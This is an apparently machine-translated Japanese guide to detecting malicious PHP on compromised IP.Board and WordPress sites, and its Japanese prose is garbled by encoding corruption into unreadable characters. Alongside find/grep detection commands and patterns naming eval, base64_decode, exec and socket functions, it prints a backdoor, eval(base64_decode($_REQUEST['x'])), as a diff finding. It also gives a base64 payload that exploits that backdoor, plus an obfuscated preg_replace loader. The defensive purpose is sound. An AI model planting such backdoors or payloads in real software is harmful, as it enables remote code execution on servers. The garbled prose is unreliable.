ã¢ã¯ã»ã¹ãã°ã確èªãã
ã©ããããå§ããã«ã¯ãå人ã®ãããã³ã°ããããµã€ãã®ã¢ã¯ã»ã¹ãã°ããããã€ãã®ãšã³ããªãå ±æããããšæããŸãã
IpreMOVED - - [01/Mar/2013:06:16:48 -0600] "POST /uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0" IpreMOVED - - [01/Mar/2013:06:12:58 -0600] "POST /public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
ãµãŒããŒäžã®ã¢ã¯ã»ã¹ãã°ãé »ç¹ã«ç¢ºèªããå¿ èŠããããŸãããæ³šæããªããšãäžèŠç¡å®³ã«èŠããURLãããéããŠããŸãããšããããŸãã
äžèšã®2ã€ã®ãã¡ã€ã«ã¯ãã¯ã©ãã«ãŒã«ãã£ãŠããŠã³ããŒããããã¹ã¯ãªããã§ãã2ã€ã®ãµãŒããŒäžã®ã³ãŒãã¯ããããç°ãªããããããããååŸããæ¹æ³ã¯å€§ããªåœ¹å²ãæãããŸããã ãã ãããã®ç¹å®ã®äŸã§ã¯ãIP.Boardã®å€ãããŒãžã§ã³ã®è匱æ§ãæªçšãããæ»æè ã¯ã«ã¹ã¿ã ããŠã³ããŒããã£ã¬ã¯ããªãIP.Boardããã£ãã·ã¥ãããã¹ãã³ã®ç»åãä¿åãããã£ã¬ã¯ããªãªã©ã®æžã蟌ã¿å¯èœãªãã£ã¬ã¯ããªã«ç¬èªã®ã¹ã¯ãªããã远å ã§ããŸããã ããã¯äžè¬çãªæ»æãã¯ãã«ã§ãããå€ãã®äººããããã®ãã£ã¬ã¯ããªã®æš©éã777ã«å€æŽããããæžã蟌ã¿ã¢ã¯ã»ã¹ãèš±å¯ããŸããããã«ã€ããŠã¯åŸã§è©³ãã説æããŸãã
äžèšã®ãã°è¡ã詳ããèŠãŠã¿ãŸããããäœãããªãããã£ããããŸãããïŒ
ã¢ã¯ã»ã¹ãã°ã§ã¯ãGETãªã¯ãšã¹ãã§ã¯ãªãPOSTãªã¯ãšã¹ãã«æ³šæããŠãã ããã
ã»ãšãã©ã®ãã°ã¯æçš¿ããŒã¿ãä¿åããªããããããããæ»æè ã¯ã¢ã¯ã»ã¹ãã°ãããç®ç«ããªããããã£ãã®ã§ãã
æªæã®ããPHPãã¡ã€ã«ã®æ€åº
ãµãŒããŒäžã®çãããphpãã¡ã€ã«ãèå¥ããæ¹æ³ã¯ããã€ããããŸããããããæè¯ã®æ¹æ³ã§ãã
ãã³ãïŒãããã®ã³ãã³ãããµã€ãã®ã«ãŒããã£ã¬ã¯ããªããå®è¡ããŸãã
æè¿å€æŽãããPHPãã¡ã€ã«ãæ€çŽ¢ãã
ç°¡åãªãã®ããå§ããŸãããããã°ããã®éphpã³ãŒãã倿ŽããŠããªããšããŸããããæ¬¡ã®ã³ãã³ãã¯ãå é±å€æŽãããçŸåšã®ãã£ã¬ã¯ããªããªãŒå ã®ãã¹ãŠã®phpãã¡ã€ã«ãæ€çŽ¢ããŸãã å¿ èŠã«å¿ããŠmtimeãªãã·ã§ã³ã倿Žã§ããŸãïŒããšãã°ã2é±é以å ã«mtime -14ïŒã
find . -type f -name '*.php' -mtime -7
ãããã³ã°ããããµãŒããŒã¯æ¬¡ã®çµæãè¿ããŸããã
./uploads/monthly_04_2008/index.php ./uploads/monthly_10_2008/index.php ./uploads/monthly_08_2009/template.php ./uploads/monthly_02_2013/index.php
ãããã®ã¹ã¯ãªããã¯ãã¹ãŠãæ»æè ã«ãã£ãŠãŠãŒã¶ãŒã®ããŠã³ããŒããã£ã¬ã¯ããªã«ã¢ããããŒããããŸããã
泚ïŒäžå®æéå ã«phpãã¡ã€ã«ã倿Žããå Žåããã®ã³ãã³ãã¯èª€ã£ãçµæãçæããŸãã æ¬¡ã®æ¹æ³ãã¯ããã«å¹æçã§ãã
äžå¯©ãªã³ãŒãã§ãã¹ãŠã®PHPãã¡ã€ã«ãæ€çŽ¢ããŸãã
ããã¯æåã®ã¢ãããŒããšã¯ã»ã©é ããæ¬¡ã®ããŒã ã¯æ»æã¹ã¯ãªãããå«ãphpãã¡ã€ã«ãæ¢ããŠããŸãã é«åºŠãªæ€çŽ¢ã䜿çšããŠãç°¡åã«å§ããŠããå€ããååŸããŸãã
evalãbase64_decodeãgzinflateããŸãã¯str_rot13ãå«ãæåã®ãã¡ã€ã«ãã§ãã¯ã
find . -type f -name '*.php' | xargs grep -l "eval *(" --color find . -type f -name '*.php' | xargs grep -l "base64_decode *(" --color find . -type f -name '*.php' | xargs grep -l "gzinflate *(" --color
ãã³ãïŒæåã®æ€çŽ¢ãã©ã¡ãŒã¿ãŒã¯æ€çŽ¢ãã£ã¬ã¯ããªã§ããããã¯çŸåšã®ãã£ã¬ã¯ããªïŒããã³ãã¹ãŠã®ãµããã£ã¬ã¯ããªïŒãæå³ããŸãã ãã®ãã©ã¡ãŒã¿ãŒãæ¢åã®ãã£ã¬ã¯ããªåã«å€æŽããŠãæ€çŽ¢çµæãæžããããšãã§ããŸããæ¬¡ã«äŸã瀺ããŸãã
find wp-admin -type f -name '*.php' | xargs grep -l "gzinflate *(" --color
grepãã-lãªãã·ã§ã³ãåé€ãããšãäžèŽãããã¡ã€ã«ã®ããã¹ãã衚瀺ãããŸãã ããã«é²ãã«ã¯ããã®çµåãããããŒã ãå©çšããŸããããã¯ããäžè¬çã§ã
find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color
ãã®ã³ãã³ãã¯ã evalïŒstr_rot13ïŒbase64_decodeïŒ
grepæ§æã¯éåžžã«åçŽã§ãããããŒãºã«åãããŠå€æŽã§ããŸãã æ¢ããŠããäžèšã®åŒãèŠãŠãã ãããããã¯ãeval *ïŒstr_rot13 *ïŒbase64_decode *ïŒ "
*ã«ç¶ãã¹ããŒã¹ã¯ããŒãå以äžã®ã¹ããŒã¹æåã瀺ããŸãã äžèšã®åŒã¯ã次ã®è¡ã«å¯ŸããŠæå¹ã§ãã
eval(str_rot13(base64_decode eval( str_rot13( base64_decode eval( str_rot13( base64_decode
ãã³ãïŒåŒãå±éããŠãmailãfsockopenãpfsockopenãstream_socket_clientãexecãsystemãpassthruãªã©ãæªæãæã£ãŠäœ¿çšã§ããæ©èœãæ¢ããŸãã ããããã¹ãŠã®å€ã1ã€ã®ã³ãã³ãã«çµåã§ããŸãã
find . -type f -name '*.php' | xargs egrep -i "(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *\("
æ³šïŒ grepã§ã¯ãªãegrepã䜿çšããŸããããã«ãããæ¡åŒµæ£èŠè¡šçŸã䜿çšã§ããŸãã
æåŸã«ãã³ãŒããé衚瀺ã«ããåæ§ã«ããç¥ãããæ¹æ³ã次ã«ç€ºããŸãã
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx4CQ FILE GOES ON FOR A LONG TIME...... lnSELWEZJakW9R3f7+J+uYuFiiC318gZ9P8C'\x29\x29\x29\x3B",".");
preg_replaceã§e修食åã䜿çšãããšããã®ã³ãŒããå®è¡ãããŸããããã¯ç°åžžã«èŠããŸãããããã€ãã®16鲿åã³ãŒãã䜿çšããã®ã¯base64 phpå§çž®ã³ãŒãã ãã§ãã
\ x65 \ x76 \ x61 \ x6C \ x28 \ x67 \ x7A \ x69 \ x6E \ x66 \ x6C \ x61 \ x74 \ x65 \ x28 \ x62 \ x61 \ x73 \ x65 \ x36 \ x34 \ x5F \ x64 \ x65 \ x63 \ x6F \ x64 \ x65 \ x28ã¯evalãšããŠå€æãããŸãïŒgzinflateïŒbase64_decodeïŒ ãããã³\ x29 \ x29 \ x29 \ x3Bãªã©ïŒïŒïŒ;
ãã®ã³ãã³ãã¯ãpreg_replaceã®äœ¿çšãèŠã€ããã®ã«åœ¹ç«ã¡ãŸãã
find . -type f -name '*.php' | xargs egrep -i "preg_replace *\((['|\"])(.).*\2[az]*e[^\1]*\1 *," --color
ãã³ãïŒãã®ã³ãã³ãã®çµæã倧éã«åŸãããå Žåã¯ãçµæããã¡ã€ã«ã«ä¿åãããã lessãšããå¥ã®ããã°ã©ã ã«ãªãã€ã¬ã¯ãããŠãäžåºŠã«1ããŒãžãã€çµæã衚瀺ã§ããŸãã fããŒã¯åæ¹ã«ã¹ã¯ããŒã«ããqããŒã¯çµäºããŸãã
find . -type f -name '*.php' | xargs grep base64_ | less find . -type f -name '*.php' | xargs grep base64_ > results.txt
äžèšã®æ€çŽ¢ã³ãã³ãã®ãããã§ããåãããšãã§ããŸãã
ãã³ãïŒæåŸã«16鲿°ã®x29ããããŸããïŒ ããã¯éãæ¬åŒ§ã§ãããx3Bã¯ã»ãã³ãã³ã§ãã ããã確èªããã«ã¯ã次ãå®è¡ããŸãã
echo chr(hexdec('x29')); echo chr(hexdec('x3B')); // outputs );
findã䜿çšããŠãããã«æ€èšŒããããã«phpãã¡ã€ã«ã§ãããã®16é²ã³ãŒããæ€çŽ¢ã§ããŸãã
find . -type f -name '*.php' | xargs grep -il x29
ã³ãŒãã§16é²å€ã䜿çšããŠããªãããšãããã£ãŠããå Žåãããã¯é©åãªã¢ãããŒãã§ãã
äºå®ãè¿°ã¹ã
ã»ãšãã©ã®æ¹æ³ã¯ãä»ã®æ»æè ãæ¢åã®phpã³ãŒããç°¡åã«å€æŽã§ããå Žåãæ»æè ããã¡ã€ã«ãåã«ã¢ããããŒãããäœããã®åœ¢ã®ã³ãŒãé£èªåã䜿çšããããšãåæãšããŠããŸãã ãã®å Žåãã³ãŒãã¯èªç¶ã«èŠããæ¢åã®ã¹ã¯ãªããã®ã¹ã¿ã€ã«ãšäžèŽããããæ··ä¹±ããå¯èœæ§ããããŸãã
ãã®åé¡ã解決ããããã«ãwordpressãvbulletinãIP.Boardãªã©ã®åºç¯ãªphpã¹ã¯ãªããã䜿çšããå Žåã¯ãã³ãŒãã®ã¯ãªãŒã³ã³ããŒãå¿ èŠã§ãã -ãã¹ãŠæºåå®äºã§ãã ããã§ãªãå Žåã¯ãgitãŸãã¯ä»ã®ããŒãžã§ã³ç®¡çã·ã¹ãã ã䜿çšããŠãã³ãŒãã®ã¯ãªãŒã³ããŒãžã§ã³ãååŸã§ããããšãé¡ã£ãŠããŸãã
ãã®äŸã§ã¯ãwordpressã䜿çšããŸãã
wordpress-cleanãã©ã«ãã2ã€ãããŸãããã®ãã©ã«ãã«ã¯ãããŠã³ããŒãããã°ããã®wordpressã®ã³ããŒãšwordpress-compromisedãå«ãŸããŠããããã¡ã€ã«ã®ã©ããã«è åšãå«ãŸããŠããŸãã
drwxr-xr-x 4 greg greg 4096 Mar 2 15:59 . drwxr-xr-x 4 greg greg 4096 Mar 2 15:59 .. drwxr-xr-x 5 greg greg 4096 Jan 24 15:53 wordpress-clean drwxr-xr-x 5 greg greg 4096 Jan 24 15:53 wordpress-compromised
次ã®ã³ãã³ããå®è¡ãããšãã€ã³ã¹ããŒã«ãããŠããã¯ãŒããã¬ã¹ãšçŽç²ãªã¯ãŒããã¬ã¹ã®éããèŠã€ããããšãã§ããŸãã
diff -r wordpress-clean/ wordpress-compromised/ -x wp-content
誰ããç¬èªã®ããŒããšãã©ã°ã€ã³ãæã£ãŠãããããwp-contentããã®æ€çŽ¢ããé€å€ããŸããã
ãã³ãïŒæ¯èŒã«ã¯åãããŒãžã§ã³ã®ã¯ãŒããã¬ã¹ã䜿çšããŠãã ããã
æ€çŽ¢çµæã¯æ¬¡ã®ãšããã§ãã
diff -r -x wp-content wordpress-clean/wp-admin/includes/class-wp-importer.php wordpress-compromised/wp-admin/includes/class-wp-importer.php 302a303,306 > > if (isset($_REQUEST['x'])) { > eval(base64_decode($_REQUEST['x'])); > }
åœŒã¯æªæã®ããã³ãŒããæ€åºããŸããïŒ
奜å¥å¿ãã...
æ»æè ã¯ãããã®3è¡ã®ã³ãŒãã§äœãã§ããŸããïŒ æåã«ãæ»æè ã¯æçšãªæ å ±ãèŠã€ããŸãã
$payload = "file_put_contents(\"../../wp-content/uploads/wp-upload.php\", \"<?php\nphpinfo();\");"; echo base64_encode($payload); // output: ZmlsZV9wdXRfY29udGVudHMoIi4uLy4uL3dwLWNvbnRlbnQvdXBsb2Fkcy93cC11cGxvYWQucGhwIiwgIjw/cGhwCnBocGluZm8oKTsiKTs=
次ã«ãGETãŸãã¯POSTãªã¯ãšã¹ããhttpïŒ/ /YOURSITE/wp-admin/includes/class-wp-importer.phpã«éä¿¡ããäžèšã§äœæããã¹ã¯ãªãããå«ããã©ã¡ãŒã¿ãŒxãéä¿¡ããŸãã å®è¡ã®çµæããã¡ã€ã«/wp-content/uploads/wp-upload.phpãäœæããããµãŒããŒã«é¢ããæ å ±ã衚瀺ãããŸãã ããã¯æªããªãããã«èŠããŸãããå®éã®ãšãããæ»æè ã¯å¿ èŠãªä»»æã®phpã³ãŒããå®è¡ã§ããŸãã
泚ïŒããã¯ãwp-content / uploadsãã£ã¬ã¯ããªãæžã蟌ã¿å¯èœãªå Žåã«ã®ã¿æ©èœããŸãã ã»ãšãã©ã®å ŽåãWebãµãŒããŒã®èšå®ã«å¿ããŠãä»ã®ãã¡ã€ã«ã®èªã¿åã/æžãèŸŒã¿æš©éã倿Žã§ããŸãã
å®è¡å¯èœã³ãŒãã®ããŠã³ããŒãã«äœ¿çšã§ãããã£ã¬ã¯ããªãåžžã«æ¢ããŸãã
äžèšã®æ¹æ³ã䜿çšãããšãããŒããã£ã¬ã¯ããªã§phpã³ãŒããç°¡åã«èŠã€ããããšãã§ããŸãã ã¯ãŒããã¬ã¹ã®å Žåãããã¯æ¬¡ã®ããã«ãªããŸãã
find wp-content/uploads -type f -name '*.php'
ãã³ãïŒããã¯ãæžã蟌ã¿å¯èœãªãã£ã¬ã¯ããªãšãã®äžã®phpãã¡ã€ã«ãæ¢ãéåžžã«åçŽãªbashã¹ã¯ãªããã§ãã çµæã¯results.txtãã¡ã€ã«ã«ä¿åãããŸãã ã¹ã¯ãªããã¯ååž°çã«åäœããŸãã
#!/bin/bash search_dir=$(pwd) writable_dirs=$(find $search_dir -type d -perm 0777) for dir in $writable_dirs do #echo $dir find $dir -type f -name '*.php' done
ãã¡ã€ã«ã«search_for_php_in_writableãšããååãä»ããå®è¡æš©éãä»äžããŸã
chmod +x search_for_php_in_writable
ãã®ãã¡ã€ã«ãããŒã ãã£ã¬ã¯ããªã«ä¿åããŠãããæ¬¡ã®ã³ãã³ããæ€çŽ¢ããŠå®è¡ãããã£ã¬ã¯ããªã«ç§»åããŸãã
~/search_for_php_in_writable > results.txt ~/search_for_php_in_writable | less
泚ïŒãµã€ããå ±æãã¹ãã£ã³ã°ã§ãã¹ããããŠãããWebãµãŒããŒãå®å šã«æ§æãããŠããªãå Žåãæ»æãåããããã®ã¯ãµã€ãã ãã§ã¯ãªãå ŽåããããŸãã è匱ãªãµã€ãã§ã®PHPã·ã§ã«ã®äžè¬çãªããŒãã¯ãåºæ¬çã«æ»æè ã«ãã¡ã€ã«ãã©ãŠã¶ãæäŸããããŒã«ã§ãã ãã®ããŒã«ã䜿çšããŠããµãŒããŒäžã®æžã蟌ã¿å¯èœãªãã¹ãŠã®ãã©ã«ããŒïŒããŠã³ããŒããã£ã¬ã¯ããªãªã©ïŒã«æ»æã¹ã¯ãªãããããŠã³ããŒãã§ããŸãã
泚ïŒã¯ã©ãã«ãŒã¯éåžžãphpã³ãŒããå«ãç»åãããŠã³ããŒãããããšãããããäžèšã®æ¹æ³ã䜿çšããŠä»ã®æ¡åŒµæ©èœã確èªããŠãã ããã
find wp-content/uploads -type f | xargs grep -i php find wp-content/uploads -type f -iname '*.jpg' | xargs grep -i php
ä¿¡ããããªãïŒ ãã®ãã¡ã€ã«ã¯jpgç»åãšããŠãããã³ã°ããããµã€ãã«ã¢ããããŒããããŸããã ãã€ããªããŒã¿ãšééããããããã§ãã ããèªã¿ããã圢åŒã®åããã¡ã€ã«ã次ã«ç€ºããŸãã
ãŸã èªããªãïŒ ç§ãšåãããã«ãããæ·±ããã§ãã¯ããŠãã ããã ãã®ã³ãŒãã¯ãã¹ãŠããã®é¢æ°ãå®è¡ããããã«èšèšãããŠããŸãã
if(!defined('FROM_IPB') && !function_exists("shutdownCallback") and @$_SERVER["HTTP_A"]=="b") { function shutdownCallback() { echo "<!--".md5("links")."-->"; } register_shutdown_function("shutdownCallback"); }
ãã®ã¹ã¯ãªãããç¡é¢ä¿ã«ããçç±ã¯ãåŠç¿ããå¿ èŠããããããŒããã£ã¬ã¯ããªã確èªããå¿ èŠãããããšã§ãã
èå³ãããå Žåãããã¯ããŒããè匱ãã©ããã確èªããããã®ãã¹ãã·ããªãªã§ãããæ»æã¯åŸã§çºçããŸãã
æªæã®ããã³ãŒããä»ã«ã©ãã«é ããŠããã®ã§ããããïŒ
PHPã³ãŒããåçã«ããŒãžã³ã³ãã³ããçæãããµã€ãããããã³ã°ãããå Žåãæ»æè ãããŒã¿ããŒã¹ã«æªæã®ããã³ãŒããæžã蟌ãå¯èœæ§ããããŸãã ãã培åºçãªãã§ãã¯ãè¡ãããšãã§ããŸãã
ãµã€ãã«ã¢ã¯ã»ã¹ããŠãããŒãžãããŒãããåŸããœãŒã¹HTMLã³ãŒãã確èªããã³ã³ãã¥ãŒã¿ãŒäžã®ã©ããã«ä¿åããŸãïŒmywebsite.txtãªã©ïŒã 次ã®ã³ãã³ããå®è¡ããŸã
grep -i '<iframe' mywebsite.txt
ããã«ãŒã¯å€ãã®å Žåããããã³ã°ããããµã€ãã«iframeãæ¿å ¥ãããµã€ãäžã®ãã¹ãŠã®ããŒãžããã§ãã¯ããŸãïŒ
ãã³ãïŒ firefoxã®firebugæ¡åŒµæ©èœã䜿çšããŠãªãœãŒã¹ã®htmlã³ã³ãã³ãã衚瀺ããŸããæ»æè ã¯javasciptã䜿çšããŠiframeãäœæã§ããŸãããã©ãŠã¶ã§ããŒãžã®ãœãŒã¹ã³ãŒãã衚瀺ãããšãããŒãžã®èªã¿èŸŒã¿åŸã«DOMã倿Žããããã衚瀺ãããŸããã ãŸããFirefoxçšã®Live HTTP Headersæ¡åŒµæ©èœããããçŸåšã®ãã¹ãŠã®ãªã¯ãšã¹ããããŒãžã«è¡šç€ºãããŸãã ããã«ãããWebãªã¯ãšã¹ããèŠããããªããŸãããããã§ã¯ãããŸããã
æ€çŽ¢ããŒã¿ããŒã¹
æ»æè ãããŒã¿ããŒã¹ã«ã³ãŒãã远å ããå¯èœæ§ããããŸãã ããã¯ãã¹ã¯ãªããããã©ã°ã€ã³ãªã©ã®ãŠãŒã¶ãŒã³ãŒããããŒã¿ããŒã¹ã«ä¿åããŠããå Žåã«ã®ã¿çºçããŸãã vBulletinãåæ§ã§ãã ããã¯ãŸãã§ããããããç¥ã£ãŠããå¿ èŠããããŸãã ãã®ã±ãŒã¹ã§ãããã³ã°ãããå Žåãæ»æè ã¯ãµã€ãã®ããŒã¿ã衚瀺ããããŒãã«ã«iframeãæ¿å ¥ããå¯èœæ§ããããŸãã
ãã®äŸã§ã¯ãmysqlãŸãã¯ãã®æŽŸçç©ã䜿çšããŸãã
ãããè¡ãã«ã¯ãPHPMyAdminã䜿çšããŸããããã¯ç§ã«ãšã£ãŠã¯æ®éã§ã¯ãããŸãããã³ãã³ãã©ã€ã³ããŒã«ã䜿çšããããšã奜ã¿ãŸããã³ãŒãã§äœ¿çšã§ããŸããããã®ããŒã«ã¯æ€çŽ¢ã«äŸ¿å©ã§ãã
å人çã«ã¯ãå®çšŒåãµãŒããŒã§PHPMyAdminãå®è¡ãããããŒã¿ããŒã¹ã®ã³ããŒãããŠã³ããŒãããŠããŒã«ã«ãµãŒããŒã§å®è¡ããŸãã ããŒã¿ããŒã¹ã倧ããå Žåã¯ãéçšãµãŒããŒã§å°ããªããã¹ããæ€çŽ¢ããããšã¯ãå§ãããŸããã
PHPMyAdminãéããããŒã¿ããŒã¹ãéžæããŠãæ€çŽ¢ããã¯ãªãã¯ããŸãã ïŒ base64_ïŒ ãïŒ evalïŒïŒ ãããã³æ¢ã«èª¬æããä»ã®çµã¿åãããªã©ã®æååãæ€çŽ¢ã§ããŸãã
Apacheã䜿çšããŠããå Žåã¯ã.htaccessãã¡ã€ã«ã確èªããŠãã ãã
Apache WebãµãŒããŒã䜿çšããŠããå Žåã¯ã.htaccessãã¡ã€ã«ã§çããã倿Žããªãã確èªããŠãã ããã
auto_append_fileããã³auto_prepend_fileã«ã¯ããã¹ãŠã®phpã¹ã¯ãªããã®å é ãŸãã¯æ«å°Ÿã«ä»ã®phpãã¡ã€ã«ãå«ãŸããŸããæ»æè ã¯ãããã䜿çšããŠã³ãŒããå«ããããšãã§ããŸãã
find . -type f -name '\.htaccess' | xargs grep -i auto_prepend_file; find . -type f -name '\.htaccess' | xargs grep -i auto_append_file;
次ã®ã³ãã³ãã¯ããhttpããå«ã.htacessãã¡ã€ã«ã®ãã¹ãŠã®ãµããã£ã¬ã¯ããªãæ€çŽ¢ããŸãã æ€çŽ¢ã®çµæã¯ãæªæã®ããã«ãŒã«ãå«ããã¹ãŠã®ãªãã€ã¬ã¯ãã«ãŒã«ã®ãªã¹ãã«ãªããŸãã
find . -type f -name '\.htaccess' | xargs grep -i http;
äžéšã®æªæã®ãããªãã€ã¬ã¯ãã¯ããŠãŒã¶ãŒãšãŒãžã§ã³ãã«åºã¥ããŠããŸãã .htaccessãã¡ã€ã«ã§HTTP_USER_AGENTã®äœ¿çšãæ¢ããšããã§ãããã åã®ã³ãã³ãã¯ç°¡åã«å€æŽã§ããŸããã»ãã³ãã³ã®åã«ããŒã¯ãŒãã倿Žããã ãã§ãã
ã»ãã¥ãªãã£ã匷åããããã«ãå¯èœã§ããã°ããã£ã¬ã¯ããªã§ã®.htaccessã®äœ¿çšãç¡å¹ã«ããæ§æãã¡ã€ã³ã®Apacheæ§æã«ç§»åããŸãã
ãå®äžçãã§
ããã§ã¯ããªã人ã ã¯ããªãã®ãµã€ããããã¯ãããã®ã§ããããïŒ äžéšã®äººã«ãšã£ãŠã¯ããã¯è¶£å³ã§ãããä»ã®äººã«ãšã£ãŠã¯åå ¥æºã§ãã
ãããã³ã°ããããµã€ãã«ã¢ããããŒããããæ»æã¹ã¯ãªããã®äŸã次ã«ç€ºããŸãã ãã¹ããªãã¬ãŒã·ã§ã³ã®ã¿ã«åºã¥ããŠããããããã®å Žåãã»ãšãã©ã®WebãµãŒããŒãã°ã¯åœ¹ã«ç«ã¡ãŸããã æçš¿ãªã¯ãšã¹ãã®ãã°ãååŸã§ããŸããã
Array ( [lsRiY] => YGFsZWN2bXBCY21uLGFtbw== [eIHSE] => PNxsDhxNdV [mFgSo] => b2NrbmtsLzIwLG96LGNtbixhbW8= [dsByW] => PldRR1A8Y3BhamtnXWprYWlxPi1XUUdQPAg+TENPRzwgQ3BhamtnIkprYWlxID4tTENPRzwIPlFX QEg8RFU4IlRoImNlcGMiMywiMjIiQWgiY25rcSIwLCIyMj4tUVdASDwiCD5RQE1GWzwIPkA8CD5m a3Q8PmMianBnZD8ganZ2cjgtLWhndnh4aW5rYWlnbCxhbW8tdXIva2xhbndmZ3EtUWtvcm5nUmtn LUZnYW1mZy1KVk9OLW5rYCxyanIgPFRoImNlcGMiMywiMjIiQWgiY25rcSIwLCIyMj4tYzw+LWZr dDwIPi1APAg+cjxqY3JyZ2wuImNsZiJ1amdsInZqZyJgbXsicGdjYWpnZiJjZWNrbCJrbHZtInZq ZyJ2bXsiYG16IksiZG13bGYib3txZ25kIkxndGdwImpnY3BmIm1kImt2LHZqZyIicmptdm1lcGNy anEibWQidmpnImNwdmtkY2F2InZqY3YidWcidWdwZyJubW1pa2xlImRtcCIiY2xmIiJyY3FxZ2Yi UnducWciImVtbWYuImpnInFja2YuImlsZ2dua2xlImBncWtmZyJtd3AiZHBrZ2xmLCJKZyJqY3Ei InZjaWdsIiI+LXI8CD4tUUBNRls8CA== [GGhp] => a3ZAbFFTSlJSbFo= [AIQXa] => e3VWT2VvQ0hyS0ha )
æªæã®ããã¹ã¯ãªããã¯ãåºæ¬çã«ã¹ãã ãŸã³ãã§ããããµãŒããŒã䜿çšããŠæçš¿ãªã¯ãšã¹ãã§ã¡ãŒã«ãéä¿¡ãããŠãŒã¶ãŒã«ã¡ãŒã«ãéä¿¡ããŸãã åæçš¿ãªã¯ãšã¹ãã®ããŒã¯å€æŽãããå¯èœæ§ããããã¹ã¯ãªããã¯éåžžã«ãªãœãŒã¹ã«å¯ãã§ãããã€ã³ã¹ããŒã«ãããŠããæ©èœããã§ãã¯ããããã«é©å¿ããŸãã ããšãã°ãphp mailïŒïŒã䜿çšã§ããªãå ŽåãããŒã25ã«ãœã±ãããäœæããSMTPçµç±ã§çŽæ¥é»åã¡ãŒã«ãéä¿¡ããããšããŸãã
äŸµå ¥è ã®ããŒã¿ã®åŸ©å·åã«é¢å¿ãããå Žåã¯ãn9a2d8ce3ãšãã颿°ã䜿çšããŸãã äžæè°ãªPOSTããŒã¿ãå®å ã¢ãã¬ã¹ãšé»åã¡ãŒã«ã®å å®¹ãæ·»ä»ããŠããŸãã
ãã®èšäºã«èšèŒãããŠããã¢ããã€ã¹ã䜿çšãããšããã®ãããªã¹ã¯ãªãããç°¡åã«èŠã€ããããšãã§ããŸãã
ãããã«
wordpressã®ãããªå ¬éphpã¹ã¯ãªããã䜿çšããå Žåã¯ãåºæ¬çãªã€ã³ã¹ããŒã«ã ãã§ãªãããã©ã°ã€ã³ãªã©ã®æ¡åŒµæ©èœã«ã€ããŠããéèŠãªæŽæ°ãŸãã¯ã»ãã¥ãªãã£æŽæ°ã«æ³šæããŠãã ããã ã»ãšãã©ã®æ»æè ã¯ãæ¢ç¥ã®è匱æ§ãæã€æ°åã®ãµã€ããèŠã€ããããšãããããè匱ãªå Žåãæçµçã«ã¯ããªããèŠã€ããŸãã
èŠçŽã«åãçµãã§ããå Žåã§ãã䜿çšããã©ã€ãã©ãªã«è匱æ§ãããã¹ãã§ã¯ãªããããåžžã«ã³ãŒãããã§ãã¯ããå¿ èŠããããŸãã